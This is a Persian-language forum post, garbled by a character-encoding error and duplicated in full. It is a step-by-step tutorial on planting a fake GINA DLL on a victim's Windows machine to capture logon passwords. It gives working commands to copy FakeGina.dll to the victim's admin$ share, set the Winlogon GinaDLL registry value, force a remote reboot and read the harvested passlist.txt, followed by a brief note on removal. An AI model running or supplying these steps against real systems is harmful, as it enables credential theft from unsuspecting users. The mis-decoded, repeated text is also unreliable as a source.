ديدم مقا لش جالبه Ú¯Ùتم بذارم بچه ها استÙاده كنن .
Graphical Identification and Authorization یا به عبارت ساده تر GINA میدانید Ú†Ù‡ هست ؟؟ در واقع این واسطه ای بین کاربر Ùˆ سیستم تعیین هویت ویندوز است ØŒ خوب Øالا اگر به جای نسخه اصلی آن ما یک نسخه سمی Ùˆ دستکاری شده قرار بدهیم چگونه است !! بله درست Ùهمیدید به همین راØتی هر کاربری Ú©Ù‡ به سیستم وارد شود ما به کلمه عبور آن Ù¾ÛŒ میبریم .
به این منظور من به شما یک نوع Fake GINA را معرÙÛŒ میکنم ØŒ قبل از هر چیز به Ntsecurity.nu بروید Ùˆ FakeGina.dll را Ú©Ù‡ Arne Vidstrom نوشته را دریاÙت کنید ØŒ خوب ما Ùکر میکنیم شما به سیستم دسترسی دارید Ùˆ امتیاز شما در Øد یک مدیر است ØŒ در این هنگام با استÙاده از دستور زیر FakeGina.dll را در پوشه %SystemRoot%\system32 Ú©Ù¾ÛŒ میکنید (روی قربانی!!) .
C:\>copy fakegina.dll \\ 10.1.1.3\admin$\system32
خوب Øالا یک نگاهی به Resource Kit های بیلی Ù…ÛŒ اندازیم Ùˆ ابزار reg.exe را پیدا میکنیم Ùˆ با سوءاستÙاده از آن مقدار زیر را به Registry قربانی وارد میکنیم . (به مقدار توجه کنید)
C:\>reg add "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDLL=fakegina.dll" REG_SZ \\10.1.1.3
خوب Øالا نگاهی دوباره به Resource Kit های بیلی Ù…ÛŒ اندازیم Ùˆ ابزار shutdown را پیدا میکنیم Ùˆ با سوء استÙاده از آن سیستم را دوباره راه اندازی میکنیم .
C:\>shutdown \\10.1.1.3 /R /T:1 /Y /C
خوب عملیات دزدی به پایان رسید Øالا منتظر میشویم یک کاربر به سیستم وارد شود ØŒ وقتی وارد شد کاÙÛŒ است Ú©Ù‡ شما یک نگاهی به Ùایل %SystemRoot%\system32\passlist.txt بیندازید .
راه دÙاع :
قبل از هر چیز fakegina.dll Ùˆ passlist.txt را جستجو کنید اگر آنها را یاÙتید Ú©Ù‡ آنها را نابود کنید ØŒ Øال بهتر است یک نسخه GINA سالم را دوباره نصب کنید !! Ùˆ کلید Registry را به Øالت اول باز گردانید . ( البته من توصیه میکنم یک بار دیگه بیلی را روی سیستم خود نصب کنید . )
امير آشتياني
Graphical Identification and Authorization یا به عبارت ساده تر GINA میدانید Ú†Ù‡ هست ؟؟ در واقع این واسطه ای بین کاربر Ùˆ سیستم تعیین هویت ویندوز است ØŒ خوب Øالا اگر به جای نسخه اصلی آن ما یک نسخه سمی Ùˆ دستکاری شده قرار بدهیم چگونه است !! بله درست Ùهمیدید به همین راØتی هر کاربری Ú©Ù‡ به سیستم وارد شود ما به کلمه عبور آن Ù¾ÛŒ میبریم .
به این منظور من به شما یک نوع Fake GINA را معرÙÛŒ میکنم ØŒ قبل از هر چیز به Ntsecurity.nu بروید Ùˆ FakeGina.dll را Ú©Ù‡ Arne Vidstrom نوشته را دریاÙت کنید ØŒ خوب ما Ùکر میکنیم شما به سیستم دسترسی دارید Ùˆ امتیاز شما در Øد یک مدیر است ØŒ در این هنگام با استÙاده از دستور زیر FakeGina.dll را در پوشه %SystemRoot%\system32 Ú©Ù¾ÛŒ میکنید (روی قربانی!!) .
C:\>copy fakegina.dll \\ 10.1.1.3\admin$\system32
خوب Øالا یک نگاهی به Resource Kit های بیلی Ù…ÛŒ اندازیم Ùˆ ابزار reg.exe را پیدا میکنیم Ùˆ با سوءاستÙاده از آن مقدار زیر را به Registry قربانی وارد میکنیم . (به مقدار توجه کنید)
C:\>reg add "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDLL=fakegina.dll" REG_SZ \\10.1.1.3
خوب Øالا نگاهی دوباره به Resource Kit های بیلی Ù…ÛŒ اندازیم Ùˆ ابزار shutdown را پیدا میکنیم Ùˆ با سوء استÙاده از آن سیستم را دوباره راه اندازی میکنیم .
C:\>shutdown \\10.1.1.3 /R /T:1 /Y /C
خوب عملیات دزدی به پایان رسید Øالا منتظر میشویم یک کاربر به سیستم وارد شود ØŒ وقتی وارد شد کاÙÛŒ است Ú©Ù‡ شما یک نگاهی به Ùایل %SystemRoot%\system32\passlist.txt بیندازید .
راه دÙاع :
قبل از هر چیز fakegina.dll Ùˆ passlist.txt را جستجو کنید اگر آنها را یاÙتید Ú©Ù‡ آنها را نابود کنید ØŒ Øال بهتر است یک نسخه GINA سالم را دوباره نصب کنید !! Ùˆ کلید Registry را به Øالت اول باز گردانید . ( البته من توصیه میکنم یک بار دیگه بیلی را روی سیستم خود نصب کنید . )
امير آشتياني
Comment